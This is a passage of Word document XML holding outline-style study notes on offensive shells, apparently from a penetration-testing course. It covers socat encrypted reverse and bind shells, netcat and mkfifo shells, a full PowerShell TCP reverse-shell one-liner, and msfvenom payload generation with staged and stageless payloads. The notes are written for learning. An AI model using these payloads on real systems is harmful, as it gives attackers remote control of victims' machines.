          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>sets up OPENSSL listener using generated certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01B610" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>verify=0 tells connection to not bother checking with CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B258EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>to connect back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A897D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat OPENSSL:&lt;LOCAL IP&gt;:&lt;LOCAL PORT&gt;,verify=0 EXEC:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4950E2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>bind shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B0CB17" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>target – socat OPENSSL-LISTEN:&lt;PORT&gt;,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696BF4CA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>attacker – socat OPENSSL:&lt;TARGET IP&gt;:&lt;TARGET PORT&gt;,verify=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AD580" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>tty shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FD93D2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat OPENSSL-LISTEN:&lt;port&gt;,cert-&lt;pem file&gt;,verify=0 &lt;second point type&gt;:`tty`,raw,echo=0 - listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061CD71A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>socat OPENSSL:&lt;ip&gt;:&lt;port&gt; EXEC:"bash -li",pty,stderr,sigint,setsid,sane – attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B74C4EF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common Shell Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3B90C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>netcat has -e flag that allows execution of a process upon connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECEF25A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>only in certain versions, these being seen as insecure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54343D3D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. nc -lvnp &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E1F21" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>executes bind shell on target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D2A40" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex. nc -lvnp &lt;port&gt; -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596ABD6E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF1F92E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>on windows, technique will work perfectly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F139D8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6844EF1B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>mkfifo /tmp/f; nc -lvnp &lt;port&gt; &lt; /tmp/f | /bin/sh &gt;/tmp/f 2&gt;&amp;1; rm /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795BE45" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>command creates a named pip a /tmp/f, then starts a netcat listener and connects input of the listener to the output of the named pipe. output of the netcat listener, the commands we send, get piped directly into sh, sending the stderr output stream into stdout, and sending stdout itself into the input of the named pipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B12048" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>netcat reverse shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54301B02" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>mkfifo /tmp/f; nc &lt;LOCAL-IP&gt; &lt;PORT&gt; &lt; /tmp/f | /bin/sh &gt;/tmp/f 2&gt;&amp;1; rm /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5489060D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>when targeting a modern Windows Server, common to require a Powershell reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B9F0E6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>powershell -c "$client = New-Object System.Net.Sockets.TCPClient('&lt;ip&gt;',&lt;port&gt;);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235B68AB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>replace IP and IP PORT with appropriate IP and choice of port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB3C0B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>then copied into cmd.exe shell or webshell and executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB3643" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>results in reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25ED47A9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2F564" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>used to generate code for reverse and bind shells, among others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FECAC63" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>extensively used for lower-level exploit development</w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E0824" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>generate hexadecimal shellcode when developing something like a Buffer Overflow exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB0D12" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>can generate .exe, .aspx, .war, and .py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2123A9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>standard syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2561E61C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>msfvenom -p &lt;payload&gt; &lt;options&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C5803D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ex – Windows x64 Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED56340" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=&lt;listen-IP&gt; LPORT=&lt;listen-port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4D65D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Staged versus Stageless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348CFE7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>staged – sent in two parts. Stager – executed directly on server itself – connects back to a waiting listener, doesn’t actually contain any reverse shell code by itself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5CD936" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>connects to listener and downloads the actual payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405D60B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>bulkier reverse shell code is downloaded when stager is activated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF12D47" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>require special Metasploit multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562C8FE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>stageless – more common – entirely self-contained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C5AE0F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>easier to use and catch, bulkier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB363F8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>easier for AV or IDS</w:t>
      </w:r>
    </w:p>
